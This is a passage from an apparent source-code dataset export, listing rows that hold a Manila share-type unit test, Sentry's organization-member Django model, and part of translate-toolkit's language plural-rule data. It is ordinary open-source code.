repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
weiting-chen/manila | manila/tests/share/test_share_types.py | 1 | 10100 | # Copyright 2015 Deutsche Telekom AG. All rights reserved.
# Copyright 2015 Tom Barron. All rights reserved.
# Copyright 2015 Mirantis, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test of Share Type methods for Manila."""
import copy
import datetime
import ddt
import mock
from manila.common import constants
from manila import context
from manila import db
from manila import exception
from manila.share import share_types
from manila import test
def create_share_type_dict(extra_specs=None):
return {
'fake_type': {
'name': 'fake1',
'extra_specs': extra_specs
}
}
@ddt.ddt
class ShareTypesTestCase(test.TestCase):
fake_type = {
'test': {
'created_at': datetime.datetime(2015, 1, 22, 11, 43, 24),
'deleted': '0',
'deleted_at': None,
'extra_specs': {},
'required_extra_specs': {},
'id': u'fooid-1',
'name': u'test',
'updated_at': None
}
}
fake_extra_specs = {u'gold': u'True'}
fake_share_type_id = u'fooid-2'
fake_type_w_extra = {
'test_with_extra': {
'created_at': datetime.datetime(2015, 1, 22, 11, 45, 31),
'deleted': '0',
'deleted_at': None,
'extra_specs': fake_extra_specs,
'required_extra_specs': {},
'id': fake_share_type_id,
'name': u'test_with_extra',
'updated_at': None
}
}
fake_type_w_valid_extra = {
'test_with_extra': {
'created_at': datetime.datetime(2015, 1, 22, 11, 45, 31),
'deleted': '0',
'deleted_at': None,
'extra_specs': {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
},
'required_extra_specs': {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
},
'id': u'fooid-2',
'name': u'test_with_extra',
'updated_at': None
}
}
fake_types = dict(fake_type.items() + fake_type_w_extra.items()
+ fake_type_w_valid_extra.items())
fake_share = {'id': u'fooid-1', 'share_type_id': fake_share_type_id}
def setUp(self):
super(ShareTypesTestCase, self).setUp()
self.context = context.get_admin_context()
@ddt.data({}, fake_type, fake_type_w_extra, fake_types)
def test_get_all_types(self, share_type):
self.mock_object(db,
'share_type_get_all',
mock.Mock(return_value=copy.deepcopy(share_type)))
returned_type = share_types.get_all_types(self.context)
self.assertItemsEqual(share_type, returned_type)
def test_get_all_types_search(self):
share_type = self.fake_type_w_extra
search_filter = {"extra_specs": {"gold": "True"}, 'is_public': True}
self.mock_object(db,
'share_type_get_all',
mock.Mock(return_value=share_type))
returned_type = share_types.get_all_types(self.context,
search_opts=search_filter)
db.share_type_get_all.assert_called_once_with(
mock.ANY, 0, filters={'is_public': True})
self.assertItemsEqual(share_type, returned_type)
search_filter = {"extra_specs": {"gold": "False"}}
returned_type = share_types.get_all_types(self.context,
search_opts=search_filter)
self.assertEqual({}, returned_type)
def test_get_share_type_extra_specs(self):
share_type = self.fake_type_w_extra['test_with_extra']
self.mock_object(db,
'share_type_get',
mock.Mock(return_value=share_type))
id = share_type['id']
extra_spec = share_types.get_share_type_extra_specs(id, key='gold')
self.assertEqual(share_type['extra_specs']['gold'], extra_spec)
extra_spec = share_types.get_share_type_extra_specs(id)
self.assertEqual(share_type['extra_specs'], extra_spec)
def test_share_types_diff(self):
share_type1 = self.fake_type['test']
share_type2 = self.fake_type_w_extra['test_with_extra']
expeted_diff = {'extra_specs': {u'gold': (None, u'True')}}
self.mock_object(db,
'share_type_get',
mock.Mock(side_effect=[share_type1, share_type2]))
(diff, equal) = share_types.share_types_diff(self.context,
share_type1['id'],
share_type2['id'])
self.assertFalse(equal)
self.assertEqual(expeted_diff, diff)
def test_share_types_diff_equal(self):
share_type = self.fake_type['test']
self.mock_object(db,
'share_type_get',
mock.Mock(return_value=share_type))
(diff, equal) = share_types.share_types_diff(self.context,
share_type['id'],
share_type['id'])
self.assertTrue(equal)
def test_get_extra_specs_from_share(self):
expected = self.fake_extra_specs
self.mock_object(share_types, 'get_share_type_extra_specs',
mock.Mock(return_value=expected))
spec_value = share_types.get_extra_specs_from_share(self.fake_share)
self.assertEqual(expected, spec_value)
share_types.get_share_type_extra_specs.assert_called_once_with(
self.fake_share_type_id)
@ddt.data({},
{"fake": "fake"},
{constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: None})
def test_create_without_required_extra_spec(self, extra_specs):
name = "fake_share_type"
self.assertRaises(exception.InvalidShareType, share_types.create,
self.context, name, extra_specs)
def test_get_share_type_required_extra_specs(self):
valid_required_extra_specs = (
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS,)
actual_result = share_types.get_required_extra_specs()
self.assertEqual(valid_required_extra_specs, actual_result)
def test_validate_required_extra_spec_other(self):
actual_result = share_types.is_valid_required_extra_spec(
'fake', 'fake')
self.assertEqual(None, actual_result)
@ddt.data('1', 'True', 'false', '0', True, False)
def test_validate_required_extra_spec_valid(self, value):
key = constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS
actual_result = share_types.is_valid_required_extra_spec(key, value)
self.assertEqual(True, actual_result)
@ddt.data('invalid', {}, '0000000000')
def test_validate_required_extra_spec_invalid(self, value):
key = constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS
actual_result = share_types.is_valid_required_extra_spec(key, value)
self.assertEqual(False, actual_result)
@ddt.data({constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'},
{constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true',
'another_key': True})
def test_get_valid_required_extra_specs_valid(self, specs):
actual_result = share_types.get_valid_required_extra_specs(specs)
valid_result = {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
}
self.assertEqual(valid_result, actual_result)
@ddt.data(None, {})
def test_get_valid_required_extra_specs_invalid(self, specs):
self.assertRaises(exception.InvalidExtraSpec,
share_types.get_valid_required_extra_specs, specs)
def test_add_access(self):
project_id = '456'
extra_specs = {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
}
share_type = share_types.create(self.context, 'type1', extra_specs)
share_type_id = share_type.get('id')
share_types.add_share_type_access(self.context, share_type_id,
project_id)
stype_access = db.share_type_access_get_all(self.context,
share_type_id)
self.assertIn(project_id, [a.project_id for a in stype_access])
def test_add_access_invalid(self):
self.assertRaises(exception.InvalidShareType,
share_types.add_share_type_access,
'fake', None, 'fake')
def test_remove_access(self):
project_id = '456'
extra_specs = {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
}
share_type = share_types.create(
self.context, 'type1', projects=['456'], extra_specs=extra_specs)
share_type_id = share_type.get('id')
share_types.remove_share_type_access(self.context, share_type_id,
project_id)
stype_access = db.share_type_access_get_all(self.context,
share_type_id)
self.assertNotIn(project_id, stype_access)
def test_remove_access_invalid(self):
self.assertRaises(exception.InvalidShareType,
share_types.remove_share_type_access,
'fake', None, 'fake')
| apache-2.0 | 3,600,138,572,918,314,500 | 38.299611 | 78 | 0.572178 | false |
gencer/sentry | src/sentry/models/organizationmember.py | 1 | 8468 | """
sentry.models.organizationmember
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import six
from bitfield import BitField
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models, transaction
from django.utils import timezone
from django.utils.encoding import force_bytes
from hashlib import md5
from structlog import get_logger
from uuid import uuid4
from six.moves.urllib.parse import urlencode
from sentry import roles
from sentry.db.models import (
BaseModel, BoundedAutoField, BoundedPositiveIntegerField, FlexibleForeignKey, Model, sane_repr
)
from sentry.utils.http import absolute_uri
class OrganizationMemberTeam(BaseModel):
__core__ = True
id = BoundedAutoField(primary_key=True)
team = FlexibleForeignKey('sentry.Team')
organizationmember = FlexibleForeignKey('sentry.OrganizationMember')
# an inactive membership simply removes the team from the default list
# but still allows them to re-join without request
is_active = models.BooleanField(default=True)
class Meta:
app_label = 'sentry'
db_table = 'sentry_organizationmember_teams'
unique_together = (('team', 'organizationmember'), )
__repr__ = sane_repr('team_id', 'organizationmember_id')
def get_audit_log_data(self):
return {
'team_slug': self.team.slug,
'member_id': self.organizationmember_id,
'email': self.organizationmember.get_email(),
'is_active': self.is_active,
}
class OrganizationMember(Model):
"""
Identifies relationships between teams and users.
Users listed as team members are considered to have access to all projects
and could be thought of as team owners (though their access level may not)
be set to ownership.
"""
__core__ = True
organization = FlexibleForeignKey('sentry.Organization', related_name="member_set")
user = FlexibleForeignKey(
settings.AUTH_USER_MODEL, null=True, blank=True, related_name="sentry_orgmember_set"
)
email = models.EmailField(null=True, blank=True)
role = models.CharField(
choices=roles.get_choices(),
max_length=32,
default=roles.get_default().id,
)
flags = BitField(
flags=(('sso:linked', 'sso:linked'), ('sso:invalid', 'sso:invalid'), ), default=0
)
token = models.CharField(max_length=64, null=True, blank=True, unique=True)
date_added = models.DateTimeField(default=timezone.now)
has_global_access = models.BooleanField(default=True)
teams = models.ManyToManyField(
'sentry.Team', blank=True, through='sentry.OrganizationMemberTeam'
)
# Deprecated -- no longer used
type = BoundedPositiveIntegerField(default=50, blank=True)
class Meta:
app_label = 'sentry'
db_table = 'sentry_organizationmember'
unique_together = (('organization', 'user'), ('organization', 'email'), )
__repr__ = sane_repr(
'organization_id',
'user_id',
'role',
)
@transaction.atomic
def save(self, *args, **kwargs):
assert self.user_id or self.email, \
'Must set user or email'
super(OrganizationMember, self).save(*args, **kwargs)
@property
def is_pending(self):
return self.user_id is None
@property
def legacy_token(self):
checksum = md5()
checksum.update(six.text_type(self.organization_id).encode('utf-8'))
checksum.update(self.get_email().encode('utf-8'))
checksum.update(force_bytes(settings.SECRET_KEY))
return checksum.hexdigest()
def generate_token(self):
return uuid4().hex + uuid4().hex
def get_invite_link(self):
if not self.is_pending:
return None
return absolute_uri(
reverse(
'sentry-accept-invite',
kwargs={
'member_id': self.id,
'token': self.token or self.legacy_token,
}
)
)
def send_invite_email(self):
from sentry.utils.email import MessageBuilder
context = {
'email': self.email,
'organization': self.organization,
'url': self.get_invite_link(),
}
msg = MessageBuilder(
subject='Join %s in using Sentry' % self.organization.name,
template='sentry/emails/member-invite.txt',
html_template='sentry/emails/member-invite.html',
type='organization.invite',
context=context,
)
try:
msg.send_async([self.get_email()])
except Exception as e:
logger = get_logger(name='sentry.mail')
logger.exception(e)
def send_sso_link_email(self, actor, provider):
from sentry.utils.email import MessageBuilder
link_args = {'organization_slug': self.organization.slug}
context = {
'organization': self.organization,
'actor': actor,
'provider': provider,
'url': absolute_uri(reverse('sentry-auth-organization', kwargs=link_args)),
}
msg = MessageBuilder(
subject='Action Required for %s' % (self.organization.name, ),
template='sentry/emails/auth-link-identity.txt',
html_template='sentry/emails/auth-link-identity.html',
type='organization.auth_link',
context=context,
)
msg.send_async([self.get_email()])
def send_sso_unlink_email(self, actor, provider):
from sentry.utils.email import MessageBuilder
from sentry.models import LostPasswordHash
email = self.get_email()
recover_uri = '{path}?{query}'.format(
path=reverse('sentry-account-recover'),
query=urlencode({'email': email}),
)
context = {
'email': email,
'recover_url': absolute_uri(recover_uri),
'has_password': self.user.password,
'organization': self.organization,
'actor': actor,
'provider': provider,
}
if not self.user.password:
password_hash = LostPasswordHash.for_user(self.user)
context['set_password_url'] = password_hash.get_absolute_url(mode='set_password')
msg = MessageBuilder(
subject='Action Required for %s' % (self.organization.name, ),
template='sentry/emails/auth-sso-disabled.txt',
html_template='sentry/emails/auth-sso-disabled.html',
type='organization.auth_sso_disabled',
context=context,
)
msg.send_async([email])
def get_display_name(self):
if self.user_id:
return self.user.get_display_name()
return self.email
def get_label(self):
if self.user_id:
return self.user.get_label()
return self.email or self.id
def get_email(self):
if self.user_id:
return self.user.email
return self.email
def get_avatar_type(self):
if self.user_id:
return self.user.get_avatar_type()
return 'letter_avatar'
def get_audit_log_data(self):
from sentry.models import Team
return {
'email':
self.email,
'user':
self.user_id,
'teams':
list(
Team.objects.filter(
id__in=OrganizationMemberTeam.objects.filter(
organizationmember=self,
is_active=True,
).values_list('team', flat=True)
).values_list('id', flat=True)
),
'has_global_access':
self.has_global_access,
'role':
self.role,
}
def get_teams(self):
from sentry.models import Team
if roles.get(self.role).is_global:
return self.organization.team_set.all()
return Team.objects.filter(
id__in=OrganizationMemberTeam.objects.filter(
organizationmember=self,
is_active=True,
).values('team')
)
def get_scopes(self):
return roles.get(self.role).scopes
| bsd-3-clause | 6,796,139,071,126,987,000 | 30.597015 | 98 | 0.596953 | false |
diorcety/translate | translate/lang/data.py | 1 | 27541 | # -*- coding: utf-8 -*-
#
# Copyright 2007-2011 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""This module stores information and functionality that relates to plurals."""
from __future__ import unicode_literals
import gettext
import locale
import os
import re
import six
try:
import pycountry
except ImportError:
pycountry = None
languages = {
'ach': ('Acholi', 2, 'n > 1'),
'af': ('Afrikaans', 2, '(n != 1)'),
'ak': ('Akan', 2, 'n > 1'),
'am': ('Amharic', 2, 'n > 1'),
'an': ('Aragonese', 2, '(n != 1)'),
'anp': ('Angika', 2, '(n != 1)'),
'ar': ('Arabic', 6,
'n==0 ? 0 : n==1 ? 1 : n==2 ? 2 : n%100>=3 && n%100<=10 ? 3 : n%100>=11 ? 4 : 5'),
'arn': ('Mapudungun; Mapuche', 2, 'n > 1'),
'as': ('Assamese', 2, '(n != 1)'),
'ast': ('Asturian; Bable; Leonese; Asturleonese', 2, '(n != 1)'),
'ay': ('Aymará', 1, '0'),
'az': ('Azerbaijani', 2, '(n != 1)'),
'be': ('Belarusian', 3,
'n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2'),
'bg': ('Bulgarian', 2, '(n != 1)'),
'bn': ('Bengali', 2, '(n != 1)'),
'bn_BD': ('Bengali (Bangladesh)', 2, '(n != 1)'),
'bn_IN': ('Bengali (India)', 2, '(n != 1)'),
'bo': ('Tibetan', 1, '0'),
'br': ('Breton', 2, 'n > 1'),
'brx': ('Bodo', 2, '(n != 1)'),
'bs': ('Bosnian', 3,
'n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2'),
'ca': ('Catalan; Valencian', 2, '(n != 1)'),
'ca@valencia': ('Catalan; Valencian (Valencia)', 2, '(n != 1)'),
'cgg': ('Chiga', 1, '0'),
'cs': ('Czech', 3, '(n==1) ? 0 : (n>=2 && n<=4) ? 1 : 2'),
'csb': ('Kashubian', 3,
'n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2'),
'cy': ('Welsh', 2, '(n==2) ? 1 : 0'),
'da': ('Danish', 2, '(n != 1)'),
'de': ('German', 2, '(n != 1)'),
'doi': ('Dogri', 2, '(n != 1)'),
'dz': ('Dzongkha', 1, '0'),
'el': ('Greek, Modern (1453-)', 2, '(n != 1)'),
'en': ('English', 2, '(n != 1)'),
'en_GB': ('English (United Kingdom)', 2, '(n != 1)'),
'en_ZA': ('English (South Africa)', 2, '(n != 1)'),
'eo': ('Esperanto', 2, '(n != 1)'),
'es': ('Spanish; Castilian', 2, '(n != 1)'),
'es_AR': ('Argentinean Spanish', 2, '(n != 1)'),
'et': ('Estonian', 2, '(n != 1)'),
'eu': ('Basque', 2, '(n != 1)'),
'fa': ('Persian', 2, 'n > 1'),
'ff': ('Fulah', 2, '(n != 1)'),
'fi': ('Finnish', 2, '(n != 1)'),
'fil': ('Filipino; Pilipino', 2, '(n > 1)'),
'fo': ('Faroese', 2, '(n != 1)'),
'fr': ('French', 2, '(n > 1)'),
'fur': ('Friulian', 2, '(n != 1)'),
'fy': ('Frisian', 2, '(n != 1)'),
'ga': ('Irish', 5, 'n==1 ? 0 : n==2 ? 1 : (n>2 && n<7) ? 2 :(n>6 && n<11) ? 3 : 4'),
'gd': ('Gaelic; Scottish Gaelic', 4, '(n==1 || n==11) ? 0 : (n==2 || n==12) ? 1 : (n > 2 && n < 20) ? 2 : 3'),
'gl': ('Galician', 2, '(n != 1)'),
'gu': ('Gujarati', 2, '(n != 1)'),
'gun': ('Gun', 2, '(n > 1)'),
'ha': ('Hausa', 2, '(n != 1)'),
'he': ('Hebrew', 2, '(n != 1)'),
'hi': ('Hindi', 2, '(n != 1)'),
'hne': ('Chhattisgarhi', 2, '(n != 1)'),
'hr': ('Croatian', 3, '(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'ht': ('Haitian; Haitian Creole', 2, '(n != 1)'),
'hu': ('Hungarian', 2, '(n != 1)'),
'hy': ('Armenian', 1, '0'),
'ia': ("Interlingua (International Auxiliary Language Association)", 2, '(n != 1)'),
'id': ('Indonesian', 1, '0'),
'is': ('Icelandic', 2, '(n != 1)'),
'it': ('Italian', 2, '(n != 1)'),
'ja': ('Japanese', 1, '0'),
'jbo': ('Lojban', 1, '0'),
'jv': ('Javanese', 2, '(n != 1)'),
'ka': ('Georgian', 1, '0'),
'kab': ('Kabyle', 2, '(n != 1)'),
'kk': ('Kazakh', 2, 'n != 1'),
'kl': ('Greenlandic', 2, '(n != 1)'),
'km': ('Central Khmer', 1, '0'),
'kn': ('Kannada', 2, '(n != 1)'),
'ko': ('Korean', 1, '0'),
'kok': ('Konkani', 2, '(n != 1)'),
'ks': ('Kashmiri', 2, '(n != 1)'),
'ku': ('Kurdish', 2, '(n != 1)'),
'kw': ('Cornish', 4, '(n==1) ? 0 : (n==2) ? 1 : (n == 3) ? 2 : 3'),
'ky': ('Kirghiz; Kyrgyz', 2, 'n != 1'),
'lb': ('Luxembourgish; Letzeburgesch', 2, '(n != 1)'),
'ln': ('Lingala', 2, '(n > 1)'),
'lo': ('Lao', 1, '0'),
'lt': ('Lithuanian', 3, '(n%10==1 && n%100!=11 ? 0 : n%10>=2 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'lv': ('Latvian', 3, '(n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2)'),
'mai': ('Maithili', 2, '(n != 1)'),
'me': ('Montenegrin', 3, 'n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2'),
'mfe': ('Morisyen', 2, '(n > 1)'),
'mg': ('Malagasy', 2, '(n > 1)'),
'mi': ('Maori', 2, '(n > 1)'),
'mk': ('Macedonian', 2, '(n==1 || n%10==1 ? 0 : 1)'),
'ml': ('Malayalam', 2, '(n != 1)'),
'mn': ('Mongolian', 2, '(n != 1)'),
'mni': ('Meithei (Manipuri)', 2, '(n != 1)'),
'mnk': ('Mandinka', 3, '(n==0 ? 0 : n==1 ? 1 : 2)'),
'mr': ('Marathi', 2, '(n != 1)'),
'ms': ('Malay', 1, '0'),
'mt': ('Maltese', 4,
'(n==1 ? 0 : n==0 || ( n%100>1 && n%100<11) ? 1 : (n%100>10 && n%100<20 ) ? 2 : 3)'),
'my': ('Burmese', 1, '0'),
'nah': ('Nahuatl languages', 2, '(n != 1)'),
'nap': ('Neapolitan', 2, '(n != 1)'),
'nb': ('Bokmål, Norwegian; Norwegian Bokmål', 2, '(n != 1)'),
'ne': ('Nepali', 2, '(n != 1)'),
'nl': ('Dutch; Flemish', 2, '(n != 1)'),
'nn': ('Norwegian Nynorsk; Nynorsk, Norwegian', 2, '(n != 1)'),
'nqo': ("N'Ko", 2, '(n > 1)'),
'nso': ('Pedi; Sepedi; Northern Sotho', 2, '(n != 1)'),
'oc': ('Occitan (post 1500)', 2, '(n > 1)'),
'or': ('Odia', 2, '(n != 1)'),
'pa': ('Panjabi; Punjabi', 2, '(n != 1)'),
'pap': ('Papiamento', 2, '(n != 1)'),
'pl': ('Polish', 3,
'(n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'pms': ('Piemontese', 2, '(n != 1)'),
'ps': ('Pushto; Pashto', 2, '(n != 1)'),
'pt': ('Portuguese', 2, '(n != 1)'),
'pt_BR': ('Portuguese (Brazil)', 2, '(n > 1)'),
'rm': ('Romansh', 2, '(n != 1)'),
'ro': ('Romanian', 3, '(n==1 ? 0 : (n==0 || (n%100 > 0 && n%100 < 20)) ? 1 : 2)'),
'ru': ('Russian', 3,
'(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'rw': ('Kinyarwanda', 2, '(n != 1)'),
'sa': ('Sanskrit', 3, '(n==1 ? 0 : n==2 ? 1 : 2)'),
'sah': ('Yakut', 1, '0'),
'sat': ('Santali', 2, '(n != 1)'),
'sco': ('Scots', 2, '(n != 1)'),
'sd': ('Sindhi', 2, '(n != 1)'),
'se': ('Northern Sami', 2, '(n != 1)'),
'si': ('Sinhala; Sinhalese', 2, '(n != 1)'),
'sk': ('Slovak', 3, '(n==1) ? 0 : (n>=2 && n<=4) ? 1 : 2'),
'sl': ('Slovenian', 4, '(n%100==1 ? 0 : n%100==2 ? 1 : n%100==3 || n%100==4 ? 2 : 3)'),
'so': ('Somali', 2, '(n != 1)'),
'son': ('Songhai languages', 1, '0'),
'sq': ('Albanian', 2, '(n != 1)'),
'sr': ('Serbian', 3,
'(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'st': ('Sotho, Southern', 2, '(n != 1)'),
'su': ('Sundanese', 1, '0'),
'sv': ('Swedish', 2, '(n != 1)'),
'sw': ('Swahili', 2, '(n != 1)'),
'szl': ('Silesian', 3,
'(n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'ta': ('Tamil', 2, '(n != 1)'),
'te': ('Telugu', 2, '(n != 1)'),
'tg': ('Tajik', 1, '0'),
'th': ('Thai', 1, '0'),
'ti': ('Tigrinya', 2, '(n > 1)'),
'tk': ('Turkmen', 2, '(n != 1)'),
'tr': ('Turkish', 2, '(n != 1)'),
'tt': ('Tatar', 1, '0'),
'ug': ('Uighur; Uyghur', 1, '0'),
'uk': ('Ukrainian', 3,
'(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'ur': ('Urdu', 2, '(n != 1)'),
'uz': ('Uzbek', 2, '(n > 1)'),
've': ('Venda', 2, '(n != 1)'),
'vi': ('Vietnamese', 1, '0'),
'wa': ('Walloon', 2, '(n > 1)'),
'wo': ('Wolof', 2, '(n != 1)'),
'yo': ('Yoruba', 2, '(n != 1)'),
'yue': ('Yue', 1, '0'),
# Chinese is difficult because the main divide is on script, not really
# country. Simplified Chinese is used mostly in China, Singapore and Malaysia.
# Traditional Chinese is used mostly in Hong Kong, Taiwan and Macau.
'zh_CN': ('Chinese (China)', 1, '0'),
'zh_HK': ('Chinese (Hong Kong)', 1, '0'),
'zh_TW': ('Chinese (Taiwan)', 1, '0'),
'zu': ('Zulu', 2, '(n != 1)'),
}
"""Dictionary of language data.
The language code is the dictionary key (which may contain country codes
and modifiers). The value is a tuple: (Full name in English from iso-codes,
nplurals, plural equation).
Note that the English names should not be used in user facing places - it
should always be passed through the function returned from tr_lang(), or at
least passed through _fix_language_name()."""
_fixed_names = {
"Asturian; Bable; Leonese; Asturleonese": "Asturian",
"Bokmål, Norwegian; Norwegian Bokmål": "Norwegian Bokmål",
"Catalan; Valencian": "Catalan",
"Central Khmer": "Khmer",
"Chichewa; Chewa; Nyanja": "Chewa; Nyanja",
"Divehi; Dhivehi; Maldivian": "Divehi",
"Dutch; Flemish": "Dutch",
"Filipino; Pilipino": "Filipino",
"Gaelic; Scottish Gaelic": "Scottish Gaelic",
"Greek, Modern (1453-)": "Greek",
"Interlingua (International Auxiliary Language Association)": "Interlingua",
"Kirghiz; Kyrgyz": "Kirghiz",
"Klingon; tlhIngan-Hol": "Klingon",
"Limburgan; Limburger; Limburgish": "Limburgish",
"Low German; Low Saxon; German, Low; Saxon, Low": "Low German",
"Luxembourgish; Letzeburgesch": "Luxembourgish",
"Ndebele, South; South Ndebele": "Southern Ndebele",
"Norwegian Nynorsk; Nynorsk, Norwegian": "Norwegian Nynorsk",
"Occitan (post 1500)": "Occitan",
"Panjabi; Punjabi": "Punjabi",
"Pedi; Sepedi; Northern Sotho": "Northern Sotho",
"Pushto; Pashto": "Pashto",
"Sinhala; Sinhalese": "Sinhala",
"Songhai languages": "Songhay",
"Sotho, Southern": "Sotho",
"Spanish; Castilian": "Spanish",
"Uighur; Uyghur": "Uyghur",
}
scripts = {
# Codes pulled from http://unicode.org/iso15924/iso15924-codes.html
# Scripts were figured out from the languages's Wikipedia pages and the
# real usage in https://mozilla.locamotion.org/
'Deva': [
'anp', # https://en.wikipedia.org/wiki/Angika_language
'bho', # https://en.wikipedia.org/wiki/Bhojpuri_language
'brx', # https://en.wikipedia.org/wiki/Bodo_language
'doi', # https://en.wikipedia.org/wiki/Dogri_language
'hi', # https://en.wikipedia.org/wiki/Hindi
'kfy', # https://en.wikipedia.org/wiki/Kumaoni_language
'kok', # https://en.wikipedia.org/wiki/Konkani_language
'mai', # https://en.wikipedia.org/wiki/Maithili_language
'mr', # https://en.wikipedia.org/wiki/Marathi_language
'sa', # https://en.wikipedia.org/wiki/Sanskrit
'sat', # https://en.wikipedia.org/wiki/Santali_language
],
'Beng': [
'bn', # https://en.wikipedia.org/wiki/Bengali_language
'mni', # https://en.wikipedia.org/wiki/Manipuri_language
],
'Tibt': [
'bo', # https://en.wikipedia.org/wiki/Standard_Tibetan
],
'Orya': [
'or', # https://en.wikipedia.org/wiki/Odia_language
],
'Gujr': [
'gu', # https://en.wikipedia.org/wiki/Gujarati_language
],
'Khmr': [
'km', # https://en.wikipedia.org/wiki/Khmer_language
],
'Knda': [
'kn', # https://en.wikipedia.org/wiki/Kannada
],
'Laoo': [
'lo', # https://en.wikipedia.org/wiki/Lao_language
],
'Mlym': [
'ml', # https://en.wikipedia.org/wiki/Malayalam
],
'Mymr': [
'my', # https://en.wikipedia.org/wiki/Burmese_language
'shn', # https://en.wikipedia.org/wiki/Shan_language
],
'Sind': [
'sd', # https://en.wikipedia.org/wiki/Sindhi_language
],
'Taml': [
'ta', # https://en.wikipedia.org/wiki/Tamil_language
],
# Unable to find the codes for the following scripts.
'assamese': [
'as', # https://en.wikipedia.org/wiki/Assamese_language
],
'perso-arabic': [
'ks', # https://en.wikipedia.org/wiki/Kashmiri_language
],
'chinese': [
'yue', # https://en.wikipedia.org/wiki/Yue_Chinese
],
}
"""Dictionary of scripts data.
The dictionary keys are ISO 15924 script codes, and script names where scripts
are missing from standard. The value is a list of codes for languages using
that script.
This is mainly used to alter the behavior of some checks (the accelerators one
for example)."""
cldr_plural_categories = [
'zero',
'one',
'two',
'few',
'many',
'other',
]
"""List of plural tags generated from CLDR 32.0.1 using
https://github.com/WeblateOrg/language-data
"""
plural_tags = {
'af': ['one', 'other'],
'ak': ['one', 'other'],
'am': ['one', 'other'],
'ar': ['zero', 'one', 'two', 'few', 'many', 'other'],
'ars': ['zero', 'one', 'two', 'few', 'many', 'other'],
'as': ['one', 'other'],
'asa': ['one', 'other'],
'ast': ['one', 'other'],
'az': ['one', 'other'],
'be': ['one', 'few', 'many'],
'bem': ['one', 'other'],
'bez': ['one', 'other'],
'bg': ['one', 'other'],
'bh': ['one', 'other'],
'bm': ['other'],
'bn': ['one', 'other'],
'bo': ['other'],
'br': ['one', 'two', 'few', 'many', 'other'],
'brx': ['one', 'other'],
'bs': ['one', 'few', 'other'],
'ca': ['one', 'other'],
'ce': ['one', 'other'],
'cgg': ['one', 'other'],
'chr': ['one', 'other'],
'ckb': ['one', 'other'],
'cs': ['one', 'few', 'other'],
'cy': ['zero', 'one', 'two', 'few', 'many', 'other'],
'da': ['one', 'other'],
'de': ['one', 'other'],
'dsb': ['one', 'two', 'few', 'other'],
'dv': ['one', 'other'],
'dz': ['other'],
'ee': ['one', 'other'],
'el': ['one', 'other'],
'en': ['one', 'other'],
'eo': ['one', 'other'],
'es': ['one', 'other'],
'et': ['one', 'other'],
'eu': ['one', 'other'],
'fa': ['one', 'other'],
'ff': ['one', 'other'],
'fi': ['one', 'other'],
'fil': ['one', 'other'],
'fo': ['one', 'other'],
'fr': ['one', 'other'],
'fur': ['one', 'other'],
'fy': ['one', 'other'],
'ga': ['one', 'two', 'few', 'many', 'other'],
'gd': ['one', 'two', 'few', 'other'],
'gl': ['one', 'other'],
'gsw': ['one', 'other'],
'gu': ['one', 'other'],
'guw': ['one', 'other'],
'gv': ['one', 'two', 'few', 'other'],
'ha': ['one', 'other'],
'haw': ['one', 'other'],
'he': ['one', 'two', 'many', 'other'],
